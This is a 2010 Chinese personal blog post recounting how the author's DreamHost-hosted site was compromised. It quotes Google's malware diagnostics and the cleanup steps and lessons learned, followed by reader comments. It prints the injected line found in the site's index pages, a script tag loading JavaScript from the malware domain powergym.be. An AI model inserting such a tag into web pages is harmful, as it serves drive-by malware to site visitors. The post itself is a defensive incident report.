在Dreamhost遭遇挂马: powergym.be


4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/

到Google的诊断页看了一下:

我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'

回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;

教训:
0 一定要备份:比如使用Amazon的S3服务作为异地备份
1 系统登录帐号尽量少,减少不必要的风险,定期更换密钥和密码;
2 WordPress目录: 尽量保持自动更新,2.8.5以前的都是有安全漏洞的;

作者:车东 发表于:2010-04-05 14:04 最后更新于:2010-04-04 15:04
版权声明:可以转载,转载时请务必以超链接形式标明文章 的原始出处和作者信息及本版权声明

Comments

怎么盯上你了呢?

最恨网站被挂马

呃,基本上跟你的关系不大我认为。
我之前也是用DH的空间,遇到过一个HACK事件,所有的index.*文件全部被篡改了(包含WEB SERVER默认目录的那个index.html也被改了),并且所有者还是root:root。
发邮件,DH承认他们遭遇了安全事件。

我是箱子,我想买 dreamhost 的空间,不知道博主可以帮我代购吗?
箱子QQ 506958405

现在WordPress 2.9.2 版本了。

dreamhost很少有,经常会出现宕机行为

你用的是虚拟主机吗?我原来用godaddy的也碰到过,但是用vps或独立服务器的话就没碰到过了

发表一个评论

(如果你此前从未在此 Blog 上发表过评论,则你的评论必须在 Blog 主人验证后才能显示,请你耐心等候。)

相关文章

关于

此页面包含了发表于2010年04月05日 下午02时11分的 Blog 上的单篇日记。

此 Blog 的前一篇日记是 中国人口年龄构成统计 2007 - 2100

此 Blog 的后一篇日记是 [招聘] 中文的LinkedIn项目招聘服务器端Linux开发和Windows客户端开发

更多信息可在 主索引 页和 归档 页看到。

Creative Commons License
此 Blog 中的日记遵循以下授权 Creative Commons(创作共用)授权.
Powered by
Movable Type 3.36